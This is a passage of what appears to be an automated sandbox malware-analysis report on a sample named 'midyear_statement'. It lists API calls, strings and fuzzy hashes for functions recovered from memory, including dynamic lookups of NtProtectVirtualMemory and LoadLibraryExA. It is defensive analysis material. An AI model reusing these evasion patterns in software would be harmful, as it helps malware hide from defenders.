• Associated: 00000000.00000002.1367494352.00000000040A0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1367976152.00000000040CC000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1368480960.0000000004100000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1368523014.00000000041F4000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_40a0000_midyear_statement.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetModuleHandleA.KERNEL32(oleaut32.dll), ref: 040AD1E1
  • Part of subcall function 040AD1AC: GetProcAddress.KERNEL32(00000000), ref: 040AD1C5
Strings
Memory Dump Source
• Source File: 00000000.00000002.1367518233.00000000040A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: true
• Associated: 00000000.00000002.1367494352.00000000040A0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1367976152.00000000040CC000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1368480960.0000000004100000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1368523014.00000000041F4000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_40a0000_midyear_statement.jbxd
Yara matches
Similarity
• API ID: AddressHandleModuleProc
• String ID: VarAdd$VarAnd$VarBoolFromStr$VarBstrFromBool$VarBstrFromCy$VarBstrFromDate$VarCmp$VarCyFromStr$VarDateFromStr$VarDiv$VarI4FromStr$VarIdiv$VarMod$VarMul$VarNeg$VarNot$VarOr$VarR4FromStr$VarR8FromStr$VarSub$VarXor$VariantChangeTypeEx$oleaut32.dll
• API String ID: 1646373207-1918263038
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetModuleHandleA.KERNEL32(ole32.dll), ref: 040B6E22
• GetProcAddress.KERNEL32(00000000,CoCreateInstanceEx), ref: 040B6E33
• GetProcAddress.KERNEL32(00000000,CoInitializeEx), ref: 040B6E43
• GetProcAddress.KERNEL32(00000000,CoAddRefServerProcess), ref: 040B6E53
• GetProcAddress.KERNEL32(00000000,CoReleaseServerProcess), ref: 040B6E63
• GetProcAddress.KERNEL32(00000000,CoResumeClassObjects), ref: 040B6E73
• GetProcAddress.KERNEL32 ref: 040B6E83
Strings
Memory Dump Source
• Source File: 00000000.00000002.1367518233.00000000040A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: true
• Associated: 00000000.00000002.1367494352.00000000040A0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1367976152.00000000040CC000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1368480960.0000000004100000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1368523014.00000000041F4000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_40a0000_midyear_statement.jbxd
Yara matches
Similarity
• API ID: AddressProc$HandleModule
• String ID: CoAddRefServerProcess$CoCreateInstanceEx$CoInitializeEx$CoReleaseServerProcess$CoResumeClassObjects$CoSuspendClassObjects$ole32.dll
• API String ID: 667068680-2233174745
Uniqueness
Uniqueness Score: -1.00%

APIs
• MessageBoxA.USER32(00000000,?,Unexpected Memory Leak,00002010), ref: 040A28CE
Strings
Memory Dump Source
• Source File: 00000000.00000002.1367518233.00000000040A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: true
• Associated: 00000000.00000002.1367494352.00000000040A0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1367976152.00000000040CC000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1368480960.0000000004100000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1368523014.00000000041F4000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_40a0000_midyear_statement.jbxd
Yara matches
Similarity
• API ID: Message
• String ID: $ bytes: $7$An unexpected memory leak has occurred. $String$The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak$Unknown
• API String ID: 2030045667-32948583
Uniqueness
Uniqueness Score: -1.00%

APIs
• IsBadReadPtr.KERNEL32(?,00000004,?,00000014), ref: 040BA018
• GetModuleHandleW.KERNEL32(C:\Windows\System32\KernelBase.dll,LoadLibraryExA,?,00000004,?,00000014), ref: 040BA02F
• GetProcAddress.KERNEL32(00000000,C:\Windows\System32\KernelBase.dll), ref: 040BA035
• IsBadReadPtr.KERNEL32(?,00000004), ref: 040BA0C3
• IsBadReadPtr.KERNEL32(?,00000002,?,00000004), ref: 040BA0CF
• IsBadReadPtr.KERNEL32(?,00000014), ref: 040BA0E3
Strings
• LoadLibraryExA, xrefs: 040BA025
• C:\Windows\System32\KernelBase.dll, xrefs: 040BA02A
Memory Dump Source
• Source File: 00000000.00000002.1367518233.00000000040A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: true
• Associated: 00000000.00000002.1367494352.00000000040A0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1367976152.00000000040CC000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1368480960.0000000004100000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1368523014.00000000041F4000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_40a0000_midyear_statement.jbxd
Yara matches
Similarity
• API ID: Read$AddressHandleModuleProc
• String ID: C:\Windows\System32\KernelBase.dll$LoadLibraryExA
• API String ID: 1061262613-1650066521
Uniqueness
Uniqueness Score: -1.00%

Strings
• The sizes of unexpected leaked medium and large blocks are: , xrefs: 040A2849
• Unexpected Memory Leak, xrefs: 040A28C0
• bytes: , xrefs: 040A275D
• , xrefs: 040A2814
• 7, xrefs: 040A26A1
• An unexpected memory leak has occurred. , xrefs: 040A2690
• The unexpected small block leaks are:, xrefs: 040A2707
Memory Dump Source
• Source File: 00000000.00000002.1367518233.00000000040A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.1367494352.00000000040A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1367976152.00000000040CC000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1368480960.0000000004100000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1368523014.00000000041F4000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_40a0000_midyear_statement.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID: $ bytes: $7$An unexpected memory leak has occurred. $The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak
                                                                                                                                                                                          • API String ID: 0-2723507874
                                                                                                                                                                                          • Opcode ID: 4286056f720e5cbce787b5ca076235165b889c422895e7190d12d3212bd613b9
                                                                                                                                                                                          • Instruction ID: 2f350bfc8bd1eef1bbdb700bd60f153fdbc64c27b85988f1a43a429e2fafa42a
                                                                                                                                                                                          • Opcode Fuzzy Hash: 4286056f720e5cbce787b5ca076235165b889c422895e7190d12d3212bd613b9
                                                                                                                                                                                          • Instruction Fuzzy Hash: A171E730A042588FEB21DBACCC84BD8B6E4EB09748F1441F9E549FB381DB75AAD5CB51
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetThreadLocale.KERNEL32(00000000,040ABFCF,?,?,00000000,00000000), ref: 040ABD3A
                                                                                                                                                                                            • Part of subcall function 040AA708: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 040AA726
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1367518233.00000000040A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.1367494352.00000000040A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1367976152.00000000040CC000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1368480960.0000000004100000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1368523014.00000000041F4000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_40a0000_midyear_statement.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Locale$InfoThread
                                                                                                                                                                                          • String ID: AMPM$:mm$:mm:ss$AMPM $m/d/yy$mmmm d, yyyy
                                                                                                                                                                                          • API String ID: 4232894706-2493093252
                                                                                                                                                                                          • Opcode ID: 75d0743507b3e71bfda660163a65b11554f5db9a9ac6950dc7daf258ec924205
                                                                                                                                                                                          • Instruction ID: f6368c2b5c02bbd574c3b442d88881bb8a8f85b739ab2e6333897c24e4e1c15d
                                                                                                                                                                                          • Opcode Fuzzy Hash: 75d0743507b3e71bfda660163a65b11554f5db9a9ac6950dc7daf258ec924205
                                                                                                                                                                                          • Instruction Fuzzy Hash: 5C613F38B001495BFB00EBE4DC80ADF76B6DB8820CF559535E601BB785DA38F926DB51
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,040A43B7,?,?,040FF7C8,?,?,040CC7A8,040A6521,040CB305), ref: 040A4329
                                                                                                                                                                                          • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,040A43B7,?,?,040FF7C8,?,?,040CC7A8,040A6521,040CB305), ref: 040A432F
                                                                                                                                                                                          • GetStdHandle.KERNEL32(000000F5,040A4378,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,040A43B7,?,?,040FF7C8), ref: 040A4344
                                                                                                                                                                                          • WriteFile.KERNEL32(00000000,000000F5,040A4378,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,040A43B7,?,?), ref: 040A434A
                                                                                                                                                                                          • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 040A4368
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1367518233.00000000040A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.1367494352.00000000040A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1367976152.00000000040CC000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1368480960.0000000004100000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1368523014.00000000041F4000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_40a0000_midyear_statement.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: FileHandleWrite$Message
                                                                                                                                                                                          • String ID: Error$Runtime error at 00000000
                                                                                                                                                                                          • API String ID: 1570097196-2970929446
                                                                                                                                                                                          • Opcode ID: 8fea0b5c0d51afc905713e640c5882aef7fbf51b082de6ce381d56c5aabe81e4
                                                                                                                                                                                          • Instruction ID: d074036b25b28dcad7a87f1ae6e700467dbf4723ef3e50608c2e5e3c3088b9cf
                                                                                                                                                                                          • Opcode Fuzzy Hash: 8fea0b5c0d51afc905713e640c5882aef7fbf51b082de6ce381d56c5aabe81e4
                                                                                                                                                                                          • Instruction Fuzzy Hash: A9F09675A84340B5FA50A7E49C09F9D264C9B85B1DF104329B215BC4C187ECB4E49765
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 040AAC80: VirtualQuery.KERNEL32(?,?,0000001C), ref: 040AAC9D
                                                                                                                                                                                            • Part of subcall function 040AAC80: GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 040AACC1
                                                                                                                                                                                            • Part of subcall function 040AAC80: GetModuleFileNameA.KERNEL32(040A0000,?,00000105), ref: 040AACDC
                                                                                                                                                                                            • Part of subcall function 040AAC80: LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 040AAD72
                                                                                                                                                                                          • CharToOemA.USER32(?,?), ref: 040AAE3F
                                                                                                                                                                                          • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,?,?), ref: 040AAE5C
                                                                                                                                                                                          • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,?,?), ref: 040AAE62
                                                                                                                                                                                          • GetStdHandle.KERNEL32(000000F4,040AAECC,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 040AAE77
                                                                                                                                                                                          • WriteFile.KERNEL32(00000000,000000F4,040AAECC,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 040AAE7D
                                                                                                                                                                                          • LoadStringA.USER32(00000000,0000FFEA,?,00000040), ref: 040AAE9F
                                                                                                                                                                                          • MessageBoxA.USER32(00000000,?,?,00002010), ref: 040AAEB5
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1367518233.00000000040A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.1367494352.00000000040A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1367976152.00000000040CC000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1368480960.0000000004100000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1368523014.00000000041F4000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_40a0000_midyear_statement.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: File$HandleLoadModuleNameStringWrite$CharMessageQueryVirtual
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 185507032-0
                                                                                                                                                                                          • Opcode ID: 0b8823413c90e1c6c675d73c7c7037f6242fb5aa676aa1f8bdb8288b128dab98
                                                                                                                                                                                          • Instruction ID: 545ab425f2794589ee1c9348865f5f5365dc71849d8e2fb9ca84b5e234a9efc9
                                                                                                                                                                                          • Opcode Fuzzy Hash: 0b8823413c90e1c6c675d73c7c7037f6242fb5aa676aa1f8bdb8288b128dab98
                                                                                                                                                                                          • Instruction Fuzzy Hash: 11112EB1248204BEF600EBE4CC45FDB77ECAB4560CF484925B694F70D0DA7AF9648B66
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 040AE569
                                                                                                                                                                                          • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 040AE585
                                                                                                                                                                                          • SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 040AE5BE
                                                                                                                                                                                          • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 040AE63B
                                                                                                                                                                                          • SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 040AE654
                                                                                                                                                                                          • VariantCopy.OLEAUT32(?,00000000), ref: 040AE689
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1367518233.00000000040A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.1367494352.00000000040A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1367976152.00000000040CC000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1368480960.0000000004100000.00000040.00001000.00020000.00000000.sdmpDownload File
• Associated: 00000000.00000002.1368523014.00000000041F4000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_40a0000_midyear_statement.jbxd
Yara matches
Similarity
• API ID: ArraySafe$BoundIndex$CopyCreateVariant
• String ID:
• API String ID: 351091851-0
• Opcode ID: 3f1af814a70b55c8983532a9b397cc056dbba34976dda2b19a0d1271600644cc
• Instruction ID: fc9a3535263ae023aa2297d5c5ca717b0e7eab39a94335d46935cb4bc4c6cc9b
• Opcode Fuzzy Hash: 3f1af814a70b55c8983532a9b397cc056dbba34976dda2b19a0d1271600644cc
• Instruction Fuzzy Hash: F2510F759416299BDB62EFA8CC90BD9B3FDAF48208F0441D5E509F7211D630BF948FA1
Uniqueness
Uniqueness Score: -1.00%

APIs
• RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 040A354E
• RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,040A359D,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 040A3581
• RegCloseKey.ADVAPI32(?,040A35A4,00000000,?,00000004,00000000,040A359D,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 040A3597
Strings
Memory Dump Source
• Source File: 00000000.00000002.1367518233.00000000040A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: true
• Associated: 00000000.00000002.1367494352.00000000040A0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1367976152.00000000040CC000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1368480960.0000000004100000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1368523014.00000000041F4000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_40a0000_midyear_statement.jbxd
Yara matches
Similarity
• API ID: CloseOpenQueryValue
• String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
• API String ID: 3677997916-4173385793
• Opcode ID: 4bf37be26f9201b45f049cc97cf04c9c2999bb80faddc977a87a8ad8920661d4
• Instruction ID: e3df1528fba73c6d53b646c673047f2bba6e85dbb39a780d74bf780d519eb798
• Opcode Fuzzy Hash: 4bf37be26f9201b45f049cc97cf04c9c2999bb80faddc977a87a8ad8920661d4
• Instruction Fuzzy Hash: 9001B5B5904318BAEB11EFE4CD06FF9B7ECDB08704F200161BA04FA580E678AA20DB54
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetThreadLocale.KERNEL32(?,00000000,040AAA2B,?,?,00000000), ref: 040AA9AC
  • Part of subcall function 040AA708: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 040AA726
• GetThreadLocale.KERNEL32(00000000,00000004,00000000,040AAA2B,?,?,00000000), ref: 040AA9DC
• EnumCalendarInfoA.KERNEL32(Function_0000A8E0,00000000,00000000,00000004), ref: 040AA9E7
• GetThreadLocale.KERNEL32(00000000,00000003,00000000,040AAA2B,?,?,00000000), ref: 040AAA05
• EnumCalendarInfoA.KERNEL32(Function_0000A91C,00000000,00000000,00000003), ref: 040AAA10
Memory Dump Source
• Source File: 00000000.00000002.1367518233.00000000040A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: true
• Associated: 00000000.00000002.1367494352.00000000040A0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1367976152.00000000040CC000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1368480960.0000000004100000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1368523014.00000000041F4000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_40a0000_midyear_statement.jbxd
Yara matches
Similarity
• API ID: Locale$InfoThread$CalendarEnum
• String ID:
• API String ID: 4102113445-0
• Opcode ID: b5a0d534e9885779cbd37e198442baf1eb6784505a3590c054c796a54d5dc8ee
• Instruction ID: 7736895e3252747cc6a0ddea8deb6a07605955720db21403770a6988f81105ca
• Opcode Fuzzy Hash: b5a0d534e9885779cbd37e198442baf1eb6784505a3590c054c796a54d5dc8ee
• Instruction Fuzzy Hash: 8D01DF357002046BF711ABF4CC11BDA76A8DB5661CF554920F500BAAC0E669BE21CAA4
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetThreadLocale.KERNEL32(?,00000000,040AAC14,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 040AAA73
  • Part of subcall function 040AA708: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 040AA726
Strings
Memory Dump Source
• Source File: 00000000.00000002.1367518233.00000000040A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: true
• Associated: 00000000.00000002.1367494352.00000000040A0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1367976152.00000000040CC000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1368480960.0000000004100000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1368523014.00000000041F4000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_40a0000_midyear_statement.jbxd
Yara matches
Similarity
• API ID: Locale$InfoThread
• String ID: eeee$ggg$yyyy
• API String ID: 4232894706-1253427255
• Opcode ID: f783715013a877157a84e8f45dcbe65b00fb6e14bd38843233a48817661e3e70
• Instruction ID: 030bb7af5d964707906bfd66f50b307ab24a0336ac3a4d5640d913b8f60784be
• Opcode Fuzzy Hash: f783715013a877157a84e8f45dcbe65b00fb6e14bd38843233a48817661e3e70
• Instruction Fuzzy Hash: 3B4102387241444BF751AAF9C8806FEF2E6DB8520CB548521D441F33D1E669FD2ADE62
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtProtectVirtualMemory), ref: 040B7999
• GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll), ref: 040B799F
Strings
• NtProtectVirtualMemory, xrefs: 040B798F
• C:\Windows\System32\ntdll.dll, xrefs: 040B7994
Memory Dump Source
• Source File: 00000000.00000002.1367518233.00000000040A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: true
• Associated: 00000000.00000002.1367494352.00000000040A0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1367976152.00000000040CC000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1368480960.0000000004100000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1368523014.00000000041F4000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_40a0000_midyear_statement.jbxd
Yara matches
Similarity
• API ID: AddressHandleModuleProc
• String ID: C:\Windows\System32\ntdll.dll$NtProtectVirtualMemory
• API String ID: 1646373207-1386159242
• Opcode ID: 0f2a53f3d3df3cb8407f0e0b524bec720c627bad8fa39efe5f2ac44919ca26f1
• Instruction ID: bf6f29efa8ecce1a4b978f6ba804a21c5c94829b4d4d867af65120e40e451ac7
• Opcode Fuzzy Hash: 0f2a53f3d3df3cb8407f0e0b524bec720c627bad8fa39efe5f2ac44919ca26f1
• Instruction Fuzzy Hash: 89E0BFB5140209AF8B40DFE9D845ECB3BECAB5C2147048411B958DB200C675F8518FB4
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetModuleHandleA.KERNEL32(kernel32.dll,?,040CB10B,00000000,040CB11E), ref: 040AC3BE
• GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExA), ref: 040AC3CF
Strings
Memory Dump Source
• Source File: 00000000.00000002.1367518233.00000000040A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: true
• Associated: 00000000.00000002.1367494352.00000000040A0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1367976152.00000000040CC000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1368480960.0000000004100000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1368523014.00000000041F4000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_40a0000_midyear_statement.jbxd
Yara matches
Similarity
• API ID: AddressHandleModuleProc
• String ID: GetDiskFreeSpaceExA$kernel32.dll
• API String ID: 1646373207-3712701948
• Opcode ID: 44a582252ca00d8e01e461a5aeb1ee7646b9f32ba32bae6a845bbef84743e9ab
• Instruction ID: 0bf295593f0d2dc1b4f53e01180158fde6d395170f25c9f0764c92ad26cef674
• Opcode Fuzzy Hash: 44a582252ca00d8e01e461a5aeb1ee7646b9f32ba32bae6a845bbef84743e9ab
• Instruction Fuzzy Hash: E2D09EB1A48301DBF7206FF5E88472635D8D718218F458835E506FA100D6BEA8684F98
Uniqueness
Uniqueness Score: -1.00%

APIs
• SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 040AE1DB
• SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 040AE1F7
• SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 040AE26E
• VariantClear.OLEAUT32(?), ref: 040AE297
Memory Dump Source
• Source File: 00000000.00000002.1367518233.00000000040A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: true
• Associated: 00000000.00000002.1367494352.00000000040A0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1367976152.00000000040CC000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1368480960.0000000004100000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1368523014.00000000041F4000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_40a0000_midyear_statement.jbxd
Yara matches
Similarity
• API ID: ArraySafe$Bound$ClearIndexVariant
• String ID:
• API String ID: 920484758-0
• Opcode ID: 7aff93a85f7897af4e013826a23d0fd18c76a7c1603c971e34bc348078debbbc
• Instruction ID: 986ceaa9716d0d1a115db46497fcc9a628e71327bd0353b67d6893577fee83d9
• Opcode Fuzzy Hash: 7aff93a85f7897af4e013826a23d0fd18c76a7c1603c971e34bc348078debbbc
• Instruction Fuzzy Hash: 9C41F7B5A412299FDB61DF98CC94BC9B3FDAF49308F0042D5E649A7211DA30BF908F90
Uniqueness

Uniqueness Score: -1.00%

APIs
• VirtualQuery.KERNEL32(?,?,0000001C), ref: 040AAC9D
• GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 040AACC1
• GetModuleFileNameA.KERNEL32(040A0000,?,00000105), ref: 040AACDC
• LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 040AAD72
Memory Dump Source
• Source File: 00000000.00000002.1367518233.00000000040A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: true
• Associated: 00000000.00000002.1367494352.00000000040A0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1367976152.00000000040CC000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1368480960.0000000004100000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1368523014.00000000041F4000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_40a0000_midyear_statement.jbxd
Yara matches
Similarity
• API ID: FileModuleName$LoadQueryStringVirtual
• String ID:
• API String ID: 3990497365-0
• Opcode ID: 2a08b05769bd4ae081920d513ff9f207de81f93745a9aa2d4593b0826f90b4bc
• Instruction ID: dd23ddbad80aef912d8ad8436d9207c7a7530a26e26ea33250906900f531dce9
• Opcode Fuzzy Hash: 2a08b05769bd4ae081920d513ff9f207de81f93745a9aa2d4593b0826f90b4bc
• Instruction Fuzzy Hash: 21413071A002589BEB61DFA8CC84BDAB7F8AB18308F0440E5A548F7291D7B5AF94CF50
Uniqueness

Uniqueness Score: -1.00%

APIs
• VirtualQuery.KERNEL32(?,?,0000001C), ref: 040AAC9D
• GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 040AACC1
• GetModuleFileNameA.KERNEL32(040A0000,?,00000105), ref: 040AACDC
• LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 040AAD72
Memory Dump Source
• Source File: 00000000.00000002.1367518233.00000000040A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: true
• Associated: 00000000.00000002.1367494352.00000000040A0000.00000002.00001000.00020000.00000000.sdmp
